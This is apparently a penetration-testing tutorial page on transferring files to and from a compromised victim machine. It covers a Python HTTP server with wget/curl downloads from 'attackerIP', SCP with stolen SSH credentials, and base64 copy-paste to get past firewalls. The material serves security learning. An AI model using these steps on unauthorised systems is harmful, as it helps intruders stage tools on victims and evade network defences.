Transferring files to/from remote victim
Once we compromised a system we could use different methods to transfer files to/from the victim depending on the situation.
Using wget or cURL
If the compromised victim has privileges enough to download files we could use wget or curl to copy a file from our own machine. First go into the directory that contains the file you want to transfer and run a simple Python HTTP server there with:
cd /transferDirectory
python3 -m http.server 8080 #8080 as an example port, use whatever
Now the server is listening on 8080 in our machine, download the file on the "compromised with code execution" victim with:
wget http://attackerIP:8080/file
or
curl http://attackerIP:8080/file -o newNameFile
Also could be vice-versa with the http server in the victim(if it has python installed) and the attacker downloading via wget/curl.
Using SSH file transfer SCP
Granted we obtained SSH credentials we could use SCP to transfer files from our attacking machine to the victim directly:
scp /local/dir/fileX user@IP:/remote/dir/fileX
Using Base64
If you are not able to transfer files directly, for example because the firewall protection prevents the victim to download files, you could use the base64 trick.
Consists on encoding the file in base64 without line breaks (-w 0
) so you can copy every detail from the file:
base64 fileX -w 0
And paste the result on the compromised machine with:
echo d2hhdCBhcmUgeW9 ... 1IGxvb2tpbmcgYXQg | base64 -d > fileX
To validate that the file transferred correctly we could check and compare the MD5 hash from the original file to the file pasted in the victim system:
md5sum fileX
Last updated